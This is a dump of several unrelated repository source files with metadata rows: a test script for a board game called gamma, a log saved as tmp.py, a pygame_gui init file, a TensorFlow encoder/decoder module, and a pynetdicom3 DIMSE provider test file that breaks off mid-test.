e07b9173fe09044ec19d2a4fbff66e5550b7c929 | 7,951 | py | Python | z2/part2/interactive/jm/random_normal_1/561870518.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 1 | 2020-04-16T12:13:47.000Z | 2020-04-16T12:13:47.000Z | z2/part2/interactive/jm/random_normal_1/561870518.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:50:15.000Z | 2020-05-19T14:58:30.000Z | z2/part2/interactive/jm/random_normal_1/561870518.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:45:13.000Z | 2020-06-09T19:18:31.000Z | from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 561870518
"""
"""
random actions, total chaos
"""
board = gamma_new(6, 8, 4, 15)
assert board is not None
assert gamma_move(board, 1, 0, 2) == 1
assert gamma_move(board, 1, 4, 2) == 1
assert gamma_move(board, 2, 3, 7) == 1
assert gamma_move(board, 2, 2, 7) == 1
assert gamma_busy_fields(board, 2) == 2
assert gamma_move(board, 3, 3, 4) == 1
assert gamma_free_fields(board, 3) == 43
board700952916 = gamma_board(board)
assert board700952916 is not None
assert board700952916 == ("..22..\n"
"......\n"
"......\n"
"...3..\n"
"......\n"
"1...1.\n"
"......\n"
"......\n")
del board700952916
board700952916 = None
assert gamma_move(board, 1, 0, 0) == 1
assert gamma_move(board, 2, 2, 4) == 1
assert gamma_free_fields(board, 2) == 41
assert gamma_move(board, 3, 1, 7) == 1
assert gamma_move(board, 3, 0, 5) == 1
assert gamma_move(board, 4, 3, 3) == 1
assert gamma_move(board, 4, 0, 5) == 0
assert gamma_move(board, 1, 5, 5) == 1
assert gamma_move(board, 1, 4, 3) == 1
assert gamma_move(board, 2, 4, 7) == 1
assert gamma_move(board, 3, 3, 5) == 1
assert gamma_move(board, 3, 2, 0) == 1
assert gamma_move(board, 4, 4, 4) == 1
assert gamma_move(board, 4, 1, 1) == 1
assert gamma_move(board, 1, 3, 5) == 0
assert gamma_free_fields(board, 1) == 31
assert gamma_move(board, 2, 5, 1) == 1
assert gamma_busy_fields(board, 3) == 5
assert gamma_move(board, 4, 4, 1) == 1
assert gamma_move(board, 1, 6, 2) == 0
assert gamma_busy_fields(board, 1) == 5
assert gamma_move(board, 2, 1, 3) == 1
assert gamma_move(board, 3, 3, 2) == 1
assert gamma_move(board, 3, 1, 5) == 1
assert gamma_move(board, 4, 3, 0) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 4, 1) == 0
assert gamma_move(board, 2, 1, 7) == 0
assert gamma_free_fields(board, 2) == 25
assert gamma_move(board, 3, 2, 2) == 1
assert gamma_move(board, 3, 2, 0) == 0
assert gamma_free_fields(board, 3) == 24
assert gamma_move(board, 4, 6, 1) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 1, 7, 0) == 0
assert gamma_move(board, 2, 6, 3) == 0
assert gamma_move(board, 3, 1, 0) == 1
assert gamma_move(board, 4, 6, 5) == 0
board137299271 = gamma_board(board)
assert board137299271 is not None
assert board137299271 == (".3222.\n"
"......\n"
"33.3.1\n"
"..234.\n"
".2.41.\n"
"1.331.\n"
".4..42\n"
"1334..\n")
del board137299271
board137299271 = None
assert gamma_move(board, 1, 2, 1) == 1
assert gamma_move(board, 1, 3, 5) == 0
assert gamma_move(board, 2, 0, 4) == 1
assert gamma_move(board, 2, 5, 4) == 1
assert gamma_busy_fields(board, 2) == 8
assert gamma_move(board, 3, 2, 5) == 1
assert gamma_move(board, 4, 0, 5) == 0
assert gamma_move(board, 4, 1, 2) == 1
assert gamma_move(board, 1, 5, 4) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 6, 5) == 0
assert gamma_move(board, 2, 5, 6) == 1
assert gamma_move(board, 3, 1, 4) == 1
assert gamma_move(board, 3, 5, 7) == 1
assert gamma_move(board, 4, 4, 6) == 1
assert gamma_move(board, 1, 6, 3) == 0
assert gamma_move(board, 1, 2, 2) == 0
assert gamma_move(board, 2, 2, 5) == 0
assert gamma_move(board, 2, 4, 4) == 0
assert gamma_golden_possible(board, 2) == 1
assert gamma_golden_move(board, 2, 1, 1) == 1
assert gamma_move(board, 3, 7, 0) == 0
assert gamma_move(board, 3, 0, 7) == 1
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 1, 1, 3) == 0
assert gamma_move(board, 1, 5, 5) == 0
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_move(board, 4, 1, 3) == 0
assert gamma_move(board, 4, 2, 3) == 1
assert gamma_move(board, 1, 1, 7) == 0
assert gamma_move(board, 1, 1, 5) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_free_fields(board, 2) == 12
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 4, 1, 3) == 0
assert gamma_move(board, 4, 0, 6) == 1
assert gamma_move(board, 1, 6, 1) == 0
assert gamma_move(board, 1, 1, 3) == 0
assert gamma_move(board, 2, 6, 1) == 0
assert gamma_move(board, 2, 0, 4) == 0
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_move(board, 3, 2, 4) == 0
assert gamma_move(board, 4, 2, 5) == 0
assert gamma_move(board, 1, 4, 1) == 0
assert gamma_move(board, 1, 4, 5) == 1
assert gamma_move(board, 2, 1, 2) == 0
assert gamma_busy_fields(board, 2) == 10
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 3, 2, 3) == 0
assert gamma_busy_fields(board, 3) == 13
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_busy_fields(board, 1) == 7
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_free_fields(board, 2) == 10
assert gamma_move(board, 3, 2, 0) == 0
assert gamma_move(board, 3, 0, 6) == 0
assert gamma_busy_fields(board, 3) == 13
assert gamma_move(board, 4, 1, 3) == 0
assert gamma_move(board, 1, 2, 2) == 0
assert gamma_move(board, 1, 5, 4) == 0
assert gamma_move(board, 2, 2, 7) == 0
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 4, 7) == 0
assert gamma_move(board, 3, 0, 4) == 0
assert gamma_move(board, 4, 3, 5) == 0
assert gamma_move(board, 4, 1, 5) == 0
assert gamma_busy_fields(board, 4) == 8
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 2, 0, 5) == 0
assert gamma_move(board, 2, 2, 7) == 0
assert gamma_busy_fields(board, 2) == 10
assert gamma_move(board, 3, 3, 5) == 0
assert gamma_busy_fields(board, 3) == 13
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 1, 1, 4) == 0
assert gamma_move(board, 2, 4, 1) == 0
assert gamma_move(board, 3, 0, 4) == 0
assert gamma_move(board, 4, 0, 3) == 1
assert gamma_golden_move(board, 4, 6, 5) == 0
assert gamma_move(board, 1, 1, 0) == 0
board301797101 = gamma_board(board)
assert board301797101 is not None
assert board301797101 == ("332223\n"
"4...42\n"
"333311\n"
"232342\n"
"42441.\n"
"14331.\n"
".21.42\n"
"1334..\n")
del board301797101
board301797101 = None
assert gamma_move(board, 2, 1, 3) == 0
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 3, 5) == 0
assert gamma_move(board, 3, 0, 0) == 0
assert gamma_free_fields(board, 3) == 9
assert gamma_move(board, 1, 4, 7) == 0
assert gamma_move(board, 2, 6, 1) == 0
assert gamma_free_fields(board, 2) == 9
assert gamma_move(board, 3, 0, 1) == 1
assert gamma_move(board, 4, 0, 5) == 0
assert gamma_move(board, 1, 3, 5) == 0
assert gamma_move(board, 2, 0, 5) == 0
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 3, 2) == 0
assert gamma_move(board, 3, 1, 7) == 0
assert gamma_move(board, 4, 3, 5) == 0
assert gamma_move(board, 4, 2, 7) == 0
assert gamma_move(board, 1, 0, 0) == 0
assert gamma_move(board, 2, 4, 6) == 0
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 6, 2) == 0
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 1, 3) == 0
assert gamma_move(board, 4, 4, 5) == 0
assert gamma_move(board, 1, 5, 0) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 6, 1) == 0
assert gamma_move(board, 2, 2, 1) == 0
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_busy_fields(board, 3) == 14
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 6, 3) == 0
assert gamma_busy_fields(board, 4) == 9
assert gamma_move(board, 1, 6, 1) == 0
assert gamma_move(board, 1, 1, 4) == 0
board493510436 = gamma_board(board)
assert board493510436 is not None
assert board493510436 == ("332223\n"
"4...42\n"
"333311\n"
"232342\n"
"42441.\n"
"14331.\n"
"321.42\n"
"1334.1\n")
del board493510436
board493510436 = None
assert gamma_move(board, 2, 6, 3) == 0
assert gamma_move(board, 3, 0, 4) == 0
assert gamma_move(board, 4, 2, 5) == 0
gamma_delete(board)
| 32.321138 | 46 | 0.65627 | 1,454 | 7,951 | 3.435351 | 0.044704 | 0.361161 | 0.375375 | 0.500501 | 0.851852 | 0.846046 | 0.770771 | 0.535335 | 0.491692 | 0.491291 | 0 | 0.13772 | 0.178091 | 7,951 | 245 | 47 | 32.453061 | 0.626626 | 0 | 0 | 0.373333 | 0 | 0 | 0.032558 | 0 | 0 | 0 | 0 | 0 | 0.768889 | 1 | 0 | false | 0 | 0.004444 | 0 | 0.004444 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e0a13ab36a98100e7db59b7f8b316f4fec7158bf | 2,777 | py | Python | tmp.py | modanesh/integrated-gradient-pytorch | 73e7b1f0b42d69556aea56fc03811a044004329e | [
"MIT"
] | null | null | null | tmp.py | modanesh/integrated-gradient-pytorch | 73e7b1f0b42d69556aea56fc03811a044004329e | [
"MIT"
] | null | null | null | tmp.py | modanesh/integrated-gradient-pytorch | 73e7b1f0b42d69556aea56fc03811a044004329e | [
"MIT"
] | null | null | null | zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero | 27.77 | 27 | 0.82139 | 496 | 2,777 | 4.59879 | 0.010081 | 0.520824 | 0.65103 | 0.911442 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0.17861 | 2,777 | 100 | 28 | 27.77 | 1 | 0 | 0 | 0.99 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
e0bab80818900cf095b2650c5eb2e77b56fffeca | 135 | py | Python | pygame_gui/__init__.py | halfninja/pygame_gui | 71b1150cb0c789339a9f8d781da15bdfad604f6c | [
"MIT"
] | null | null | null | pygame_gui/__init__.py | halfninja/pygame_gui | 71b1150cb0c789339a9f8d781da15bdfad604f6c | [
"MIT"
] | null | null | null | pygame_gui/__init__.py | halfninja/pygame_gui | 71b1150cb0c789339a9f8d781da15bdfad604f6c | [
"MIT"
] | null | null | null | from pygame_gui.ui_manager import UIManager
from pygame_gui import core
from pygame_gui import elements
from pygame_gui import windows
| 27 | 43 | 0.874074 | 22 | 135 | 5.136364 | 0.454545 | 0.353982 | 0.460177 | 0.504425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118519 | 135 | 4 | 44 | 33.75 | 0.94958 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
46110641613a51f4bd6181bb4ff623ee9f6ff767 | 1,495 | py | Python | avb/auxvae/models/full0.py | lim0606/AdversarialVariationalBayes | 93487ca64007c8381e1ed5fc3d131b5da751ba47 | [
"MIT"
] | 206 | 2017-05-13T12:59:57.000Z | 2022-03-30T08:42:41.000Z | avb/auxvae/models/full0.py | lim0606/AdversarialVariationalBayes | 93487ca64007c8381e1ed5fc3d131b5da751ba47 | [
"MIT"
] | 7 | 2017-05-13T12:59:46.000Z | 2020-01-28T12:41:13.000Z | avb/auxvae/models/full0.py | lim0606/AdversarialVariationalBayes | 93487ca64007c8381e1ed5fc3d131b5da751ba47 | [
"MIT"
] | 58 | 2017-05-15T16:27:15.000Z | 2021-12-15T12:39:12.000Z | import tensorflow as tf
from tensorflow.contrib import slim as slim
from avb.ops import *
import math
def encoder(x, a, config, is_training=True):
z_dim = config['z_dim']
# Center x at 0
x = 2*x - 1
x = flatten_spatial(x)
net = tf.concat([x, a], axis=1)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
zmean = slim.fully_connected(net, z_dim, activation_fn=None)
log_zstd = slim.fully_connected(net, z_dim, activation_fn=None)
return zmean, log_zstd
def encoder_aux(x, config, is_training=True):
a_dim = config['a_dim']
# Center x at 0
x = 2*x - 1
net = flatten_spatial(x)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
amean = slim.fully_connected(net, a_dim, activation_fn=None)
log_astd = slim.fully_connected(net, a_dim, activation_fn=None)
return amean, log_astd
def decoder_aux(x, z, config, is_training=True):
a_dim = config['a_dim']
x = 2*x - 1
x = flatten_spatial(x)
net = tf.concat([x, z], axis=1)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
amean = slim.fully_connected(net, a_dim, activation_fn=None)
log_astd = slim.fully_connected(net, a_dim, activation_fn=None)
return amean, log_astd
| 27.181818 | 70 | 0.692977 | 244 | 1,495 | 4.040984 | 0.188525 | 0.109533 | 0.219067 | 0.255578 | 0.801217 | 0.792089 | 0.792089 | 0.792089 | 0.792089 | 0.612576 | 0 | 0.023121 | 0.189967 | 1,495 | 54 | 71 | 27.685185 | 0.791082 | 0.01806 | 0 | 0.575758 | 0 | 0 | 0.010239 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.121212 | 0 | 0.30303 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1ca351f7a8b95b1a8b6adf3440bef416c803f7b0 | 30,943 | py | Python | pynetdicom3/tests/test_dimse_provider.py | sisobus/pynetdicom3 | c9d3d1b52f17a107566f31e63e0e4d0e8aaacbab | [
"MIT"
] | 2 | 2019-02-07T08:02:30.000Z | 2019-03-20T04:00:20.000Z | pynetdicom3/tests/test_dimse_provider.py | sisobus/pynetdicom3 | c9d3d1b52f17a107566f31e63e0e4d0e8aaacbab | [
"MIT"
] | null | null | null | pynetdicom3/tests/test_dimse_provider.py | sisobus/pynetdicom3 | c9d3d1b52f17a107566f31e63e0e4d0e8aaacbab | [
"MIT"
] | 1 | 2019-04-11T07:39:06.000Z | 2019-04-11T07:39:06.000Z | #!/usr/bin/env python
"""Test DIMSE service provider operations.
TODO: Add testing of maximum pdu length flow from assoc negotiation
"""
from io import BytesIO
import logging
import pytest
from pydicom.dataset import Dataset
from pynetdicom3.dimse import DIMSEServiceProvider
from pynetdicom3.dimse_messages import (
C_STORE_RQ, C_STORE_RSP, C_FIND_RQ, C_FIND_RSP, C_GET_RQ, C_GET_RSP,
C_MOVE_RQ, C_MOVE_RSP, C_ECHO_RQ,C_ECHO_RSP, C_CANCEL_RQ,
N_EVENT_REPORT_RQ, N_EVENT_REPORT_RSP, N_GET_RQ, N_GET_RSP, N_SET_RQ,
N_SET_RSP, N_ACTION_RQ, N_ACTION_RSP, N_CREATE_RQ, N_CREATE_RSP,
N_DELETE_RQ, N_DELETE_RSP
)
from pynetdicom3.dimse_primitives import (
C_STORE, C_ECHO, C_GET, C_MOVE, C_FIND, N_EVENT_REPORT, N_SET, N_GET,
N_ACTION, N_CREATE, N_DELETE, C_CANCEL
)
from pynetdicom3.dsutils import encode
from .encoded_dimse_msg import c_store_ds
from .encoded_dimse_n_msg import (
n_er_rq_ds, n_er_rsp_ds, n_get_rsp_ds, n_set_rq_ds, n_set_rsp_ds,
n_action_rq_ds, n_action_rsp_ds, n_create_rq_ds, n_create_rsp_ds
)
# Suppress pynetdicom3's log output during the test run; only
# CRITICAL-level records will be emitted.
LOGGER = logging.getLogger('pynetdicom3')
LOGGER.setLevel(logging.CRITICAL)
class DummyDUL(object):
    """Stand-in for the DUL provider when testing the DIMSE provider.

    Implements just enough of the DUL interface for a
    ``DIMSEServiceProvider`` to be constructed and exercised without a
    real transport: the service always appears alive, sends and
    receives are no-ops, and a PDU of type 0x01 is always pending.
    """
    @staticmethod
    def is_alive():
        """Pretend the DUL is always running."""
        return True

    @staticmethod
    def send_pdu(pdv):
        """No-op stand-in for ``DUL.send_pdu`` (tests DIMSE sending)."""

    @staticmethod
    def receive_pdu():
        """No-op stand-in for ``DUL.receive_pdu`` (tests DIMSE receiving)."""

    @staticmethod
    def peek_next_pdu():
        """Always report a pending PDU of type 0x01."""
        return 0x01
# (primitive instance, (request message class name, response message class
# name)) pairs used to parametrise the message-sending tests. The C_CANCEL
# entry has ``None`` in the request slot: its encoded message, C_CANCEL_RQ,
# is produced by the response branch of the test (it carries
# MessageIDBeingRespondedTo rather than MessageID).
REFERENCE_MSG = [
    (C_ECHO(), ('C_ECHO_RQ', 'C_ECHO_RSP')),
    (C_STORE(), ('C_STORE_RQ', 'C_STORE_RSP')),
    (C_FIND(), ('C_FIND_RQ', 'C_FIND_RSP')),
    (C_GET(), ('C_GET_RQ', 'C_GET_RSP')),
    (C_MOVE(), ('C_MOVE_RQ', 'C_MOVE_RSP')),
    (C_CANCEL(), (None, 'C_CANCEL_RQ')),
    (N_EVENT_REPORT(), ('N_EVENT_REPORT_RQ', 'N_EVENT_REPORT_RSP')),
    (N_GET(), ('N_GET_RQ', 'N_GET_RSP')),
    (N_SET(), ('N_SET_RQ', 'N_SET_RSP')),
    (N_ACTION(), ('N_ACTION_RQ', 'N_ACTION_RSP')),
    (N_CREATE(), ('N_CREATE_RQ', 'N_CREATE_RSP')),
    (N_DELETE(), ('N_DELETE_RQ', 'N_DELETE_RSP')),
]
class TestDIMSEProvider(object):
    """Tests for the DIMSE service provider's send/receive operations."""
    def setup(self):
        """Create a fresh DIMSE provider backed by a dummy DUL."""
        self.dimse = DIMSEServiceProvider(DummyDUL(), 1)

    def test_receive_not_pdata(self):
        """A non-P-DATA primitive yields (None, None) from receive_msg."""
        result = self.dimse.receive_msg(True)
        assert result == (None, None)

    @pytest.mark.parametrize("primitive, cls_name", REFERENCE_MSG)
    def test_send_msg(self, primitive, cls_name):
        """Each primitive encodes to the expected -RQ and -RSP message."""
        # Request form: needs a message ID and an affected SOP class
        primitive.MessageID = 1
        primitive.AffectedSOPClassUID = '1.1.1'

        def check_rq(msg):
            """Assert the encoded request message class name."""
            assert msg.__class__.__name__ == cls_name[0]

        self.dimse.on_send_dimse_message = check_rq
        # C_CANCEL has no request slot (cls_name[0] is None); skip it
        if cls_name[0]:
            self.dimse.send_msg(primitive, 1)

        # Response form: needs the responded-to ID and a status
        primitive.MessageIDBeingRespondedTo = 1
        primitive.Status = 0x0000

        def check_rsp(msg):
            """Assert the encoded response message class name."""
            assert msg.__class__.__name__ == cls_name[1]

        self.dimse.on_send_dimse_message = check_rsp
        self.dimse.send_msg(primitive, 1)

    # Receive tests (placeholders, not yet implemented)
    def test_receive_timeout(self):
        """Placeholder: DIMSE timeout on receive."""
        pass

    def test_receive_c_echo(self):
        """Placeholder: receiving DIMSE C-ECHO messages."""
        pass

    def test_receive_c_store(self):
        """Placeholder: receiving DIMSE C-STORE messages."""
        pass

    def test_receive_c_find(self):
        """Placeholder: receiving DIMSE C-FIND messages."""
        pass

    def test_receive_c_get(self):
        """Placeholder: receiving DIMSE C-GET messages."""
        pass

    def test_receive_c_move(self):
        """Placeholder: receiving DIMSE C-MOVE messages."""
        pass

    def test_receive_n_event_report(self):
        """Placeholder: receiving DIMSE N-EVENT-REPORT messages."""
        pass

    def test_receive_n_get(self):
        """Placeholder: receiving DIMSE N-GET messages."""
        pass

    def test_receive_n_set(self):
        """Placeholder: receiving DIMSE N-SET messages."""
        pass

    def test_receive_n_action(self):
        """Placeholder: receiving DIMSE N-ACTION messages."""
        pass

    def test_receive_n_create(self):
        """Placeholder: receiving DIMSE N-CREATE messages."""
        pass

    def test_receive_n_delete(self):
        """Placeholder: receiving DIMSE N-DELETE messages."""
        pass
class TestDIMSEProviderCallbacks(object):
"""Test the callbacks for the DIMSE Service"""
def setup(self):
"""Set up"""
self.dimse = DIMSEServiceProvider(DummyDUL(), 1)
def test_callback_send_c_echo(self):
"""Check callback for sending DIMSE C-ECHO messages."""
# C-ECHO-RQ
primitive = C_ECHO()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
self.dimse.send_msg(primitive, 1)
# C-ECHO-RSP
primitive = C_ECHO()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
def test_callback_send_c_store(self):
"""Check callback for sending DIMSE C-STORE messages."""
# C-STORE-RQ
primitive = C_STORE()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2' # CT
primitive.AffectedSOPInstanceUID = '1.1.2'
primitive.Priority = 0x02
primitive.DataSet = BytesIO()
# CT + no dataset
self.dimse.send_msg(primitive, 1)
primitive.AffectedSOPClassUID = '1.1.1'
# No UID type, no dataset
# MR + dataset
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.4' # MR
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.DataSet = bytestream
self.dimse.send_msg(primitive, 1)
# C-STORE-RSP
primitive = C_STORE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
def test_callback_send_c_find(self):
"""Check callback for sending DIMSE C-FIND messages."""
# C-FIND-RQ
primitive = C_FIND()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
primitive.Priority = 0x02
primitive.Identifier = BytesIO()
# No dataset
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
self.dimse.send_msg(primitive, 1)
# C-FIND-RSP
primitive = C_FIND()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
primitive.AffectedSOPClassUID = '1.1.1'
# No dataset
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
primitive.Status = 0xFF00 # Only has dataset when 0xFF00 or 0xFF01
self.dimse.send_msg(primitive, 1)
def test_callback_send_c_get(self):
"""Check callback for sending DIMSE C-GET messages."""
# C-GET-RQ
primitive = C_GET()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
primitive.Identifier = BytesIO()
# No dataset
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
self.dimse.send_msg(primitive, 1)
# C-GET-RSP
primitive = C_GET()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
primitive.Identifier = BytesIO()
# No dataset
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
self.dimse.send_msg(primitive, 1)
def test_callback_send_c_move(self):
"""Check callback for sending DIMSE C-MOVE messages."""
# C-MOVE-RQ
primitive = C_MOVE()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
primitive.MoveDestination = b'TESTSCP'
# No dataset
primitive.Identifier = BytesIO()
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
self.dimse.send_msg(primitive, 1)
# C-MOVE-RSP
primitive = C_MOVE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
# No dataset
primitive.Identifier = BytesIO()
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_event_report(self):
"""Check callback for sending DIMSE N-EVENT-REPORT messages."""
# N-EVENT-REPORT-RQ
primitive = N_EVENT_REPORT()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1'
primitive.EventTypeID = 2
self.dimse.send_msg(primitive, 1)
# User defined
primitive.EventInformation = BytesIO(n_er_rq_ds)
self.dimse.send_msg(primitive, 1)
# N-EVENT-REPORT-RSP
primitive = N_EVENT_REPORT()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
# User defined
primitive.AffectedSOPClassUID = '1.2'
primitive.AffectedSOPInstanceUID = '1.2.3'
primitive.EventTypeID = 4
primitive.EventReply = BytesIO(n_er_rsp_ds)
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_get(self):
"""Check callback for sending DIMSE N-GET messages."""
# N-GET-RQ
primitive = N_GET()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
self.dimse.send_msg(primitive, 1)
# Plus user defined
primitive.AttributeIdentifierList = [(0x0000, 0x0000), (0xffff, 0xffff)]
self.dimse.send_msg(primitive, 1)
# N-GET-RSP
# Mandatory elements
primitive = N_GET()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
self.dimse.send_msg(primitive, 1)
# Conditional
primitive.AttributeList = BytesIO(n_get_rsp_ds)
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_set(self):
"""Check callback for sending DIMSE N-SET messages."""
# N-SET-RQ
primitive = N_SET()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
primitive.ModificationList = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
# N-SET-RSP
primitive = N_SET()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
